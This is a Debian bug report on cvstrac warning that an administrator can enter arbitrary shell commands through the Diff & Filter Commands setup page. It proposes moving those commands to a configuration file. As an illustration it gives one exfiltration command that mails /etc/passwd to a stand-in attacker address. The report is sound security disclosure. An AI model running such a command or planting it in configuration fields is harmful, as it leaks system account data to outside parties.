Package: cvstrac Severity: normal The cvstrac has a potential security issue, whereby if a hacker gains knowlege of the administrative password, he can gain access to shell commands and compromise the whole system.
Here is the issue: The hacker obtains the administrative password via brute force, or other means. He now logs onto cvstrac as an administrator. To access the shell commands, the user can now navigate the menus as follows: Setup Diff & Filter Commands The user can now enter malicious shell commands in the text box, for example: cat /etc/passwd|mail hac...@badguys.net It would be better if any shell commands used by cvstrac were stored in a configuration file /etc/cvstrac/cvsconfig.conf rather than enabling them to be edited via the cvstrac interface, or a facility was provided to disable this configuration option. Mark. -- System Information: Debian Release: 5.0.2 APT prefers stable APT policy: (990, 'stable'), (50, 'unstable') Architecture: i386 (i686) Kernel: Linux 2.6.26-2-486 Locale: LANG=en_GB, LC_CTYPE=en_GB (charmap=ISO-8859-1) Shell: /bin/sh linked to /bin/bash Versions of packages cvstrac depends on: ii libc6 2.7-18 GNU C Library: Shared libraries ii libsqlite3-0 3.5.9-6 SQLite 3 shared library pn rcs <none> (no description available) cvstrac recommends no packages. cvstrac suggests no packages. -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
